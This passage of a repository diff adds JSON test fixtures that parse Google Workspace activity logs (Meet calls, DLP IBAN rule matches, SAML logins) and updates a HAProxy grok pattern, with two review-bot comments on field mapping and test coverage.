alue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",
\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file 
diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json new file mode 100644 index 000000000..de33d47c4 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json 
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\"
:\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value
\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json 
@@ -41,13 +41,20 @@ "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json new file mode 100644 index 000000000..3f7ef889b --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_1.json 
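Review bot: After this change `user.email` is `joe.done@test.com` while `user.name` and `related.user` in the same document remain `jone.doe`, so the `user.*` block now describes two different identities. The input is outside the hunk, but the email presumably now comes from a different parameter than the actor (the organizer address, as in the new call_ended fixtures); if so, pairing the participant's name with the organizer's email is a misattribution rather than a typo fix. Keep `user.email` derived from the same address as `user.name`, carry the other address in a dedicated field, and list both local parts in `related.user` if both are meant to be searchable. The added IPv6 `source.ip`/`related.ip` expectation itself looks right.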
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 
IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json 
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": 
"LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..8a9785816 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json 
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, 
+ "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..de8e102d7 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
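Review bot: Both new SAML fixtures — this file and `test_saml_login_success_1.json` in the next hunk — exercise only `saml_status_code: SUCCESS_URI` and differ just in values, so the `event.type: allowed` mapping has no negative case; if the parser maps a non-success status code to a different `event.type`, that branch is unasserted. Replacing the near-duplicate with a fixture whose `saml_status_code` is not `SUCCESS_URI` would cover it at no extra cost. Note also that `user.name` and `related.user` keep the source casing (`John.doe`) while the DLP fixture above yields `john.doe`, so the parser appears to pass the actor email's local part through unnormalised; consumers correlating on `user.name` should expect the raw casing.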
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + 
"application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/HAProxy/haproxy/CHANGELOG.md b/HAProxy/haproxy/CHANGELOG.md index 60e2c8a26..9896476a3 100644 --- a/HAProxy/haproxy/CHANGELOG.md +++ b/HAProxy/haproxy/CHANGELOG.md @@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +## 2024-12.04 - 1.0.1 + +- Add support for aktci at the end of the log + ## 2024-03.04 - 1.0.0 ### Added diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml index 98783cd3d..557604c8a 100644 --- a/HAProxy/haproxy/ingest/parser.yml +++ b/HAProxy/haproxy/ingest/parser.yml 
@@ -14,7 +14,7 @@ pipeline:
 ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9])
 HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})"
 TLS_PROTOCOL: "TLS"
- HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?'
+ HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?%{GREEDYDATA}'
 - name: json
 filter: "{{grok.message.json_msg | length > 0}}"
